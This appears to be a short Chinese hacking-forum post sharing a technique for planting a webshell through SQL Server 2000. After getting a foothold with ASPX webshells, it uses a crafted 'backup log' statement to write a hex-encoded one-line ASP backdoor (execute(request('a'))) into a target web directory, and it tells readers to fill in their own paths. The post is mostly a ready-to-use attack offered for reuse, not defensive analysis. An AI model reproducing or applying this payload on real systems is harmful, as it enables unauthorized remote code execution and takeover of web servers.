前天幫死亡節奏提權一黑客站使用一種技術寫出來大家分享。
測試環境:
Windows 2003 SQLserver 2000 MySQL5.x 目標站點是asp,有shell的站點是ASPx。shell的SQLserver2000權限是public。
使用工具:
ASPxIISpy馬 專業操作SQLserver數據庫馬
使用ASPxIISpy馬得到目標路徑,使用SQLserver馬操作backup webshell。
語句如下:
alter database null set RECOVERY FULL;create table cmd (a image);backup log null to disk = "f:\cmd" with init;insert into cmd (a) values (0x3C2565786563757465287265717565737428226122292
9253EDA);backup log null to disk = "備份路徑"--
語句裡邊的一些東西需要自己修改!
